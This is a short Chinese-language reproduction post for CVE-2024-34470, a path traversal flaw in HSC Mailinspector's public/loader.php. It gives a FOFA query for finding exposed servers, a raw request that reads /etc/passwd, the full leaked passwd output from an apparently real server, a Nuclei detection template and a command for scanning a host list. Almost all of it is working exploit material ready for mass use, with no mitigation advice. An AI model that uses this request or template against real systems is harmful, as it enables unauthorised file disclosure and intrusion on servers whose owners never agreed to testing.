CVE-2024-34470漏洞复现

body="mailinspector/public"

GET /mailinspector/public/loader.php?path=../../../../../../../etc/passwd HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Accept: */*Accept-Encoding: gzip, deflateConnection: keep-alive

HTTP/1.1 200 OKConnection: closeContent-Length: 2299Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Content-Type: text/html; charset=utf-8Date: Tue, 04 Jun 2024 02:35:59 GMTExpires: 0Last-Modified: Tue, 04 Jun 2024 02:35:59 GMTPragma: no-cacheServer: ApacheSet-Cookie: PHPSESSID=6nhso8qu3vegqmridckcd39910; path=/;HttpOnly;SecureX-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockroot:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinnews:x:9:13:news:/etc/news:uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologinnscd:x:28:28:NSCD Daemon:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinrpc:x:32:32:Portmapper RPC user:/:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinpcap:x:77:77::/var/arpwatch:/sbin/nologindistcache:x:94:94:Distcache:/:/sbin/nologinapache:x:48:48:Apache:/var/www:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinavahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologinnamed:x:25:25:Named:/var/named:/sbin/nologinmemcached:x:101:102:Memcached daemon:/var/run/memcached:/sbin/nologinavahi:x:70:70:Avahi daemon:/:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinclam:x:102:103:Clam Anti Virus Checker:/var/lib/clamav:/sbin/nologinfsaua:x:500:500::/var/opt/f-secure/fsaua/fsaua:/sbin/nologinesets:x:103:104::/home/esets:/bin/falsehacluster:x:498:496::/var/lib/heartbeat/cores/hacluster:/bin/bashhaproxy:x:188:188::/var/lib/haproxy:/sbin/nologinmysql:x:499:497:MySQL server:/var/lib/mysql:/bin/bashopendkim:x:15:498:OpenDKIM Milter:/var/run/opendkim:/sbin/nologinsqlgrey:x:501:501::/var/sqlgrey:/bin/trueadmin:x:502:502::/home/admin:/opt/hsc/appliance/bin/shell.shopendmarc:x:16:499:OpenDMARC Milter:/var/run/opendmarc:/sbin/nologinpostfix:x:17:16::/var/spool/postfix:/bin/truesuportehsc:x:0:0::/home/suportehsc:/bin/bashredis:x:18:17:Redis Server:/usr/com/redis:/sbin/nologin

https://github.com/osvaldotenorio/CVE-2024-34470

id: CVE-2024-34470info:  name: HSC Mailinspector loader.php 任意文件读取漏洞  author: fgz  severity: high  description: HSC Mailinspector是一个电子邮件检查工具 ，在HSC Mailinspector 5.2.17-3到5.2.18版本中发现了一个问题。public/loader.php文件中存在一个未经身份验证的路径遍历漏洞。path参数无法正确筛选传递的文件和目录是否为webroot的一部分，从而使攻击者能够读取服务器上的任意文件。  metadata:    max-request: 1    fofa-query: body="mailinspector/public"    verified: truerequests:  - raw:      - |+        GET /mailinspector/public/loader.php?path=../../../../../../../etc/passwd HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15        Accept-Encoding: gzip, deflate        Accept: */*        Connection: keep-alive    matchers:      - type: dsl        dsl:          - "status_code == 200 && contains(body, 'root:')"

nuclei.exe -t mypoc/cve/CVE-2024-34470.yaml -l 1.txt